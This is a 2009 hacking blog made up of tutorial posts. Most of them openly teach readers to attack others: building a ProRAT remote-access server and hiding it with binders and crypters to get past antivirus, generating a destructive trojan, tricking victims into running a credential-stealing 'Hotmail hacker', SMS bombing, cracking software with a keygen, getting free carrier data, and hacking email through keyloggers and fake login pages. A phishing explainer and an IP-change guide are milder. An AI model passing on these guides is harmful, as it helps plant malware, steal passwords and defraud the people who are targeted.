Friday, November 27, 2009

PRORAT : Remote PC Access Software

4 comments

In my last articlas about hard ware key loggers and adramx key logger , i am posting this security article to inform about installation and use of PRORAT. PRORAT is a RAT (Remote Administration Tool) used as
remote pc access software.

remote pc access software.

PRORAT hacking software


PRORAT - Remote pc access software:

1. Download PRORAT software for remote pc access.


2. Unzip downloaded file using Winzix to use this remote pc access software

3. Now, the unzipped file will contain Prorat.exe file. Run the file on your computer.

4. Now, we have to create a server to send it to remote computer for remote pc access. So, click on Create ->Create Prorat server.

5. Go to no-ip.com and register for an account.


Remote pc access software PRORAT

6. Now, in Pro connective notification, enter in IP(DNS) address, the link provided to you by no-ip and let all remaining fields remain unchecked.

7. Alongwith using Pro connective notification, you can even use your mail address to confirm about server installation.

8. You can even bind the server with a specific file to prevent victim knowing about the server installation on his computer.

9. To change server default icon, click on "Server icon" on left option pane and select any suitable icon according to binded file.

10. Now, when all things are done, hit on "Create server" and you will get server created in Prorat directory. This server is used for remote pc access.

11. This ends server creation part over here. Just refer Remote pc access tutorial for more information.... the best PRORAT tutorial i found.

You will require to have Winzix to get PRORAT - remote pc access software. Download Winzix here.


Now, when you have created PRORAT server, next step is to send this server to victim computer and then use PRORAT for remote pc access. You can use Binder to avoid our server trojan from being detected by antivirus. I will explain in my next article about how to connect to remote PRORAT server on remote victim computer and then use this for remote pc access. If you have any problem in using this
PRORAT for remote pc access,
please mention it in comments section.

[update : you can use fud crypter to by pass antivirus detection]

Enjoy remote pc access software...

Monday, November 23, 2009

Virus creator to create torjan virus

1 comments

This virus creator software is easy to use and is used to create virus trojan which harasses user. In this article, I have explained how to create torjan virus


Virus creator to create virus trojan:


1. Download VIRUS CREATOR S
oftware to create virus trojan.


2. Unzip the file using Winzix ( download here) to obtain Virus creator to
create virus







3. Run Virus Creator V.65 on your computer to get something like:

Atomic virus creator

4. Now, Virus creator will ask you for various options listed below:

#
name of virus
# Save virus to startup
# Save to homedrive
# Save to system32
# Save to desktop
# Disable scheduled tasks
# Create 10 users
# Corrupt system files
# Open 10 command windows
# Start world's most annoying webpages 10 times
# Reset time to midnight
# Memory leak

These options determine effectiveness of your virus. You can choose options preferences as you like and depending on amount of damage you wish the virus should do to victim.

Now, when you have selected preferences, simply press enter and virus creator software will create virus trojan for you.

5. Now, all you have to do is send this created virus to your victim and ask him to run this virus on his computer(Social Engineering). You can use Binder to make this virus undetectable from antivirus and even prevent doubt of victim.

You will require to have Winzix to download Virus creator software. Free Download Winzix here. Remember to install.
Thus, you now know how to create virus trojan using Virus creator software. Remember to bind this virus with Binder. I have tried to keep this virus creator tutorial simple. If you have any problem in usingvirus creator to create virus,please mention it in comments.

Enjoy Virus creator software to create virus...


Sunday, November 22, 2009

Binder software to disable Antivirus detection

2 comments


What is Binder???

Binder is a free software used to bind or combine two or more files in one file under one name and extension. The files to be binded can have any extension or icon. The user has choice to select the name, icon and various attributes of binded file. If binded file contains an application (in our case - RAT or keylogger), the application is also run when the actual binded file is run.
thus Binder is used to bypass antivirus detection.

I have provided link to download binder.




How to use Binder???


1. first of all, you need a binder. So, download free Binder software.


2. Unzip the downloaded file using Winzix (free download here) to obtain Binder setup.

3. Install software on your computer to see:

Binder software to disable antivirus

4. Now, click on "Select File #1" and select the kelloger or RAT you wanna bind to avoid its antivirus detection.

5. Click on "Select File #2" and select the normal file with which you wanna bind our trojan, RAT or Kelogger.

6. Simply, hit on "Bind" to obtain the binded keylogger or trojan file. Now, simply send this file to victim whom this file will appear normal (trojan is hidden due to binding).

7. Remember to check both "Execute"options and you can use "EXE Pump" to increase your file size to desired value.

please post comments




Saturday, November 21, 2009

Use Mobile Phone as a Microphone and Speakers

1 comments





No one like to use their microphone and speakers when they talk to their family and friend in Yahoo messenger, Msn Messenger, Skype, Google Talks and so many instant messenger software. Now you can make use of you mobile as microphone and speakers to talk with you friends and family believe me it's simple and easy, just follow the step by step guide and you will throw you microphone into bin forever.

You don't have to remain in one place to talk with friends an family, if you have USB bluetooth or WIFI router you can remain anywhere in your home and enjoy talking with your friends and save your cost forever.

Here is the step by step guide to make your mobile phone as microphone.

1. Download the file from This link and read the following steps.
2. In this file you will get one folder (I_LOVE_DVT) and two separate file. One is for PC application and another is for mobile application.
3. Install the PC software name as "mobiolaheadset2_wl_s60v3" in PC and install the mobile application name as "headset_s60_v_2_0" into mobile.
4. Remember if your don't have Blue tooth or WIFI functions, it will not work. Yeah it works for Cable but what is the difference between a cable and normal Microphone.
5. Installed the application in PC as well in mobile now open the folder "I_LOVE_DVT" and in it you will find two files, one is "keymaker" and other is "runme". Copy these two files into the install directory such as "C:\Program Files\Mobiola Headset for S60" and paste it.
6. Now run the "runme" and "keymaker" as well. From "runme" copy the Hardware fingerprint something like "373D-BCC0" into "keymaker's" H/W ID and press generate.
7. Now copy the keys and the name from "keymaker" into "runme" and press ok. It show valid. Now run the PC application and check it.
8. Than go to control Panel, sound and device. Run the sound and devices settings find the microphones one, select your microphone driver to mobiola and select the speaker driver.
9. Check your microphone by going to Volume controls and run any song to check your speakers that you can hear the song in your mobile speaker.
10. Enjoy talking with your friends and family and save your cost.

Friday, November 13, 2009

FOLDER LOCK -NO SOFTWARE

0 comments
Want to hide your ‘really’ private data ? but reluctant to use professional SOFTWARE
Create a simple folder lock without using any software

Here is how to do that -

Create a new folder,rename it to a simple name like xero.
Now go to its properties,and choose a sprite less icon,which is next to a Yellow lock icon in third row.
choose a sprite less iconChoose it,click OK and now folder will have no icon,literally invisible.Now to make it almost inaccessible,we must use some Batch renaming technique.

Create a new text file in the same drive next to the folder and type thiscommand statement into it-

ren xero xero.{b5946137-7b9f-4925-af80-51abd60b20d5}

type this command statement exactly

Now save this text file as lock.bat. Similarly create another text file and type this command statement into it-

ren xero.{b5946137-7b9f-4925-af80-51abd60b20d5} xero

type this command statement exactly

Save this text file as lock.bat . Lock.bat will be used to make the folder inaccessible and Key.bat will be used to revert it into its original form.

What we have done here,is that we have renamed the folder with a random CLSID,which will change its identity into something else sing DOS. ‘CLSID’ is a unique registry-identifying component that is used to identify anActiveX control or in simple language,it identifies which file/control will be opened by which program in Windows. I have determined the CLSID by opening registry editor and searching for “CLSID” and choosing any random value like {b5946137-7b9f-4925-af80-51abd60b20d5} which I m using here.

Some common CLSID’s are -

  • Recycle bin - 645FF040-5081-101B-9F08-00AA002F954E
  • Control panel - 21EC2020-3AEA-1069-A2DD-08002B30309D
  • Run - 2559A1F3-21D7-11D4-BDAF-00C04F60B9F0
  • Search - 2559A1F0-21D7-11D4-BDAF-00C04F60B9F0
  • Connect To - 7007ACC7-3202-11D1-AAD2-00805FC1270E
  • Briefcase - 85BBD920-42A0-1069-A2E4-08002B30309D
  • Help - 2559A1F1-21D7-11D4-BDAF-00C04F60B9F0
  • Fonts - D20EA4E1-3957-11d2-A40B-0C5020524152
  • Cameras and Scanners - E211B736-43FD-11D1-9EFB-0000F8757FCD
  • My Network places - 208D2C60-3AEA-1069-A2D7-08002B30309D

Sorry for a little diversion,but I thought that was necessary. Now you have created the files,just double click the lock.bat file to make the folder inaccessible. Now the folder is invisible and also it cant be accessed by anyone.

But still,it has a name. So,in order to completely hide it, Rename it and enter an ASCII code by pressing ALT+0160 which will enter a null character in place of name and it will have No Name.

Now we have a completely hidden and inaccessible folder.

Congrats..Now you have created an inaccessible folder. To access it,just rename the folder into its original name and then click on key.bat . Now make sure to place the folder in a secure location and place lock.bat and key.bat in different locations . This simple folder lock is very effective as no one has idea that You can create it (sarcasm..again :P) .

Use some creativity and you can make that folder 100% inaccessible by encrypting it. I gave you a hint,find your own way :)

Hotmail Hacker - Hack Hotmail

0 comments
I was just wandering around web and came across software to hack Hotmail password. This Hotmail Hacker is 100% working way to hack Hotmail password




Hotmail Hacker - Hack Hotmail password:


1.
Free Download Hotmail hacker to hack hotmail password.


2. Download
Winzix (free download here) to obtain Hotmail hacker folder.

3. Run, Hotmail hacker builder.exe file to see:





4. Now, enter your email account address, password and also the subject of email you want to receive. This email will contain the password you wanna hack. Also select appropriate smtp serveraddress. You can use smtp server addresses for this. Avoid use of hotmail email account. Can use gmail, yahoo or such. Click on "Build". This will create your own Hotmail hacker in Hotmail hacker folder.



5. Now, send this Hotmail Hacker.exe file to victim whose you wanna hack Hotmail password and tell him that this Hotmail hacker software is used to hack Hotmail password. Convince him that he can hack anyone's hotmail password using this Hotmail hacker. Ask him to run Hotmail Hacker.exe and enter all information (which includes his Hotmail id and password plus Hotmail id of victim he wanna hack).

6. As he enters this information and hits "Login And Start", he will receive error message as shown.



7. And you will receive in your inbox a mail like this:



8. Cheers.... you are able to hack Hotmail password using Hotmail hacker - hotmail cracker software.

You will require to have Winzix to get Hotmail Hacker software. Download Winzix here.
That's it for today. I hope you are now well approached with this way tohack Hotmail password using Hotmail hacker.This way to hack hotmail password using hotmail hacker is 100% working.. personally tested. If you face problems in using Hotmail hacker to hack hotmail password, mention it in comments.

Enjoy Hotmail hacker to hack hotmail password...




Thursday, November 5, 2009

Cell phone SMS bomber

1 comments
This wonderful application developed by Shockwave is used to send unlimited number of text messages to target cell phone - thus, bomb the cellphone with desired number of messages, and thus hack friend's cell phone. Just read on... I have provided link for SOFTWARE DOWNLOAD


Cell phone SMS bomber:


1. Free Download Cell Phone SMS Bomber free software to hack friend's cell phone.
Password: techotips.blogspot.com

2. Unzip the downloaded file using Winzix (free download here) to obtain free software Cell Phone SMS Bomber.

3. Now, run Cell Phone SMS Bomber.exe file on your computer system to see:



4. Simply select the network provider from dropdown list, then enter victim number and number of times the text message is to be sent. Also, enter the actual text message you wanna bomb to mobile phone. You should have internet connection for cell phone sms bomber to work.

5. Now, simply hit "Bomb Cell phone" and Cell Phone SMS Bomber will start sending (bombing) text messages to victim cell phone... thus, hacking cell phone.

Note: This Cell Phone SMS Bomber is found currently supporting following wireless networks:

# Verizon
# AT&T
# Nextel
# Sprint
# T-Mobile
# Boost Mobile
# Alltel

You will require to have Winzix to get Cell Phone SMS Bomber software. Download Winzix here.
So guys that's all about Cell Phone SMS Bomber - software to hack friend's cell phone. Lemme know your feedback about this Cell Phone SMS Bomber tohack your friend's cell phoneby sending him unlimited number of text messages. If you have any problem in using this Cell Phone SMS Bomber to hack your friend's cell phone, please mention it in comments.

Enjoy Cell Phone SMS Bomber...

HACK AIRTEL GPRS

0 comments
Airtelguru has developed cool browser to hack airtel gprs to get free airtel gprs. So, I have written this article to inform you about airtel free GPRS trick/hack.

Hack Airtel Free GPRS

Air tel free GPRS hack:


1.
Download HERE Airtel free GPRS browser to hack airtel GPRS.


2. Unzip this file using
Winzix (free download here) to obtain Airtel free GPRS software.

3. Now, install this browser in your
mobile. This Airtel free GPRS browser is same as Opera Mini browser, but this browser is modified to use proxy server to get Airtel free GPRS.

4. After installation, press Accept and OK sequentially and get
Mobile Officesettings from Airtel. Start airtel free GPRS browser using Mobile Office as Internet access profile and you will start using Airtel free GPRS. Thus, we are able to hack Airtel to get free Airtel GPRS.

Note: In some cases, you're charged 30 paise after exiting from browser. You can surf as many sites as you can and then after exiting, you'll be charged only 30 paise for that session. So, if you don't wanna lose any money, simple logic is to not to exit from Airtel free GPRS browser. Just keep it minimized and running in background.
Also, you can avoid 30 paise cutting by maintaining balance below 30 paise.

You will require to have Winzix to get Airtel free GPRS Browser software. Download Winzix here.
So friends, this Airtel hack to get
free Airtel gprs will surely work for you. I havepersonally tried this out in Maharashtra and found it working to get Airtel free gprs. If you find this working, please mention "Your State" in comments so that other Airtel subscribers of your state may also be benefitted. If you have any problem in using this trick tohack Airtel for Airtel free gprs,please mention it in comments.

Enjoy n hack Airtel for Airtel free GPRS...

Tuesday, November 3, 2009

What is Phishing ?

0 comments



Phishing is an attempt to criminally and fraudulently acquire sensitive information, such as usernames, passwords and credit card details, by appearing as a trustworthy entity in an electronic communication. eBay, PayPal and other online banks are common targets. Phishing is typically carried out by email or instant messaging and often directs users to enter details at a website, although phone contact has also been used. Phishing is an example of social engineering techniques used to fool users. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical measures.

Recent phishing attempts have targeted the customers of banks and online payment services. Social networking sites such as Orkut are also a target of phishing.

Spoofed/Fraudulent e-mails are the most widely used tools to carry out the phishing attack. In most cases we get a fake e-mail that appears to have come from a Trusted Website . Here the hacker may request us to verify username & password by replaying to a given email address.

TECHNIQUES BEHIND PHISHING ATTACK

1.Link Manipulation

Most methods of phishing use some form of technical deception designed to make a link in an email appear to belong to some trusted organization or spoofed organization. Misspelled URLs or the use of subdomains are common tricks used by phishers, such as this example URL

www.micosoft.com

www.mircosoft.com

www.verify-microsoft.com

instead of http://www.microsoft.com/

2.Filter Evasion

Phishers have used images instead of text to make it harder for anti-phishing filters to detect text commonly used in phishing emails. This is the reason Gmail or Yahoo will disable the images by default for incoming mails.

How does a phishing attack/scam look like?

As scam artists become more sophisticated, so do their phishing e-mail messages and pop-up windows. They often include official-looking logos from real organizations and other identifying information taken directly from legitimate Web sites. Here is an example of how the phishing scam email looks like

Example of a phishing e-mail message, including a deceptive URL address linking to a scam Web site.
To make these phishing e-mail messages look even more legitimate, the scam artists may place a link in them that appears to go to the legitimate Web site (1), but it actually takes you to a phishing site (2) or possibly a pop-up window that looks exactly like the official site.

These copycat sites are also called “spoofed” Web sites. Once you’re at one of these spoofed sites, you may send personal information to the hackers.

How to identify a fraudulent e-mail?

Here are a few phrases to look for if you think an e-mail message is a phishing scam.

“Verify your account.”

Legitimate sites will never ask you to send passwords, login names, Social Security numbers, or any other personal information through e-mail.

“If you don’t respond within 48 hours, your account will be closed.”

These messages convey a sense of urgency so that you’ll respond immediately without thinking.

“Dear Valued Customer.”

Phishing e-mail messages are usually sent out in bulk and often do not contain your first or last name.

“Click the link below to gain access to your account.”

HTML-formatted messages can contain links or forms that you can fill out just as you’d fill out a form on a Web site. The links that you are urged to click may contain all or part of a real company’s name and are usually “masked,” meaning that the link you see does not take you to that address but somewhere different, usually a scam Web site.

Change IP Address

0 comments



How to change your IP address in less than a minute? The following trick gives you a step-by-step procedure to change your IP address.

1. Click on “Start” in the bottom left hand corner of screen.

2. Click on “Run”.

3. Type in “command” and hit ok.You should now be at an MSDOS prompt screen.

4. Type “ipconfig /release” just like that, and hit “enter”.

5. Type “exit” and leave the prompt.

6. Right-click on “Network Places” or “My Network Places” on your desktop.

7. Click on “properties”.

You should now be on a screen with something titled “Local Area Connection”, or something close to that.

8. Right click on “Local Area Connection” and click “properties”.

9. Double-click on the “Internet Protocol (TCP/IP)” from the list under the “General” tab.

10. Click on “Use the following IP address” under the “General” tab.

11. Create an IP address (It doesn’t matter what it is. I just type 1 and 2 until i fill the area up).

12. Press “Tab” and it should automatically fill in the “Subnet Mask” section with default numbers.

13. Hit the “Ok” button here.

14. Hit the “Ok” button again.You should now be back to the “Local Area Connection” screen.

15. Right-click back on “Local Area Connection” and go to properties again.

16. Go back to the “TCP/IP” settings.

17. This time, select “Obtain an IP address automatically”.

18. Hit “Ok”.

19. Hit “Ok” again.

20. You now have a new IP address.

Some ISPs do not support this type of procedure and hence there are chances of getting back the same old IP address even after trying this hack.In this case you need to switch off the modem and then switch it on to get the new IP address.

NOTE: All these tricks works only if you have a dynamic IP address.But if you have a static IP address you have no option to change your IP.



How to Hack an Email using Hardware Keylogger

2 comments


Did you know that keyloggers are the simplest way to hack an email password?. Today I’ll be giving you a detailed information on hardware keyloggers and their use.I will also teach how to hack an email using hardware keylogger. If you are new to the concept of keyloggers or haven’t read my previous post about email hacking then you must refer my previous post Hacking an email account. Here i’ll give a breif description about keyloggers.
A software keylogger (or simple keylogger) is a stealth computer program that captures every keystroke entered through the keyboard.
Now i’ll tell you what is a hardware keylogger and how it can be used for hacking an email.

Hardware Keyloggers are used for keystroke logging, a method of capturing and recording computer user keystrokes. They plug in between a computer keyboard and a computer and log all keyboard activity to an internal memory. They are designed to work with PS/2 keyboards, and more recently with USB keyboards. A hardware keylogger appears simply as a USB pendrive (thumb drive) or any other computer peripheral so that the victims can never doubt that it is a keylogger. So by looking at it’s appearence it is not possible to identify it as a keylogger. Here are some of the images of hardware keyloggers for your convenience.
So by looking at the above images we can come to know that hardware keyloggers look just like any USB or PS/2 device. So it is very hard to identify it as a keylogger.
Insatalling a Hardware Keylogger to Hack the Email Password
The hardware keylogger must be installed between the keyboard plug and the USB or PS/2 port socket. That is you have to just plug in the keylogger to your keyboard’s plug (PS/2 or USB) and then plug it to the PC socket. The following image shows how the keylogger is installed.
Once you install the hardware keylogger as shown in the above two images the keylogger starts recording each and every keystroke of the keyboard including email passwords and other confidential information. The hardware keylogger has an inbuilt memory in which the logs are stored.

Update:- you can download sniper spy to hack remote computers from here

How to Hack an Email Account

0 comments

How to Hack an Email



Everyday I get a lot of emails wherein my readers ask me How to Hack an Email? You as the reader are most likely reading this because you want to hack into someone’s email. So in this post I have decided to uncover the real and working ways to hack any email.
Can Emails Be Hacked?
Yes! As a matter of fact, almost anything can be hacked. But before you learn the real ways to hack email, the following are the things you should be aware of.
1. There is no ready made software that can hack emails just with a click of a button. So if you come accross a site selling “Email Hacking software” plz don’t trust it.
2. Never trust any email hacking service that claims to hack any email just for $100 or $200. All of the email hacking services are scam.
3. With my experience of over 6 years in the field of Hacking and Security, I can tell you that there exists only 2 foolproof methods to hack an email. All the other email hacking methods are simply scam or don’t work. The following are the only 2 working and foolproof methods for email hacking.

1. EASIEST WAY TO HACK AN EMAIL

The easiest way to hack an email is by using a keylogger. A keylogger is a small program that monitors each and every keystroke that a user types on a specific computer’s keyboard. To use it you don’t need to have any special knowledge. Anyone with a basic knowledge of computer can use it. With my experience I recommend the following keyloggers as the best for hacking email.
SniperSpy
Win-Spy



I don’t have physical access to the target computer, can I still use sniperspy?
Yes you can still use it for hacking email. Because keyloggers like SniperSpy and Win-Spy offers Remote Installation Feature. With this feature it is possible to remotely install the keylogger on the victim’s PC. However they can also work on a local computer.



What if the antivirus block from sending it as an email attachment?
Instead of sending the keylogger as an email attachment, you place the file in .ZIP/.RAR format and upload it to www.hotlinkfiles.com. After uploading, just send the direct download link to the victim via email. Once he downloads the file from this link and run it, the keylogger will get installed automatically.




SniperSpy Homepage



2. OTHER WAYS TO HACK AN EMAIL

The other most commonly used trick for hacking email is by using Fake Login Pages. Fake login pages are created by many hackers on their sites which appear exactly as Gmail or Yahoo login pages but the entered details(username & pw) are redirected to remote server and we get redirected to some other page. Many times we ignore this but finally we lose our valuable data. However creating a fake login page and taking it online to successfully hack an email is not an easy job. It demands an in depth technical knowledge of HTML and scripting languages like PHP, JSP etc. So I recommend the usage of keyloggers for hacking email since it’s the easiest one.
I hope this info has helped you. Happy Email Hacking!

Update:- you can download sniper spy to hack remote computers from here







 

| How to Hack....... © 2010. All Rights Reserved | Template Style by Lord HTML | Design by Mohammad Mustafa Ahmedzai | Back To Top |

Your Text Link Here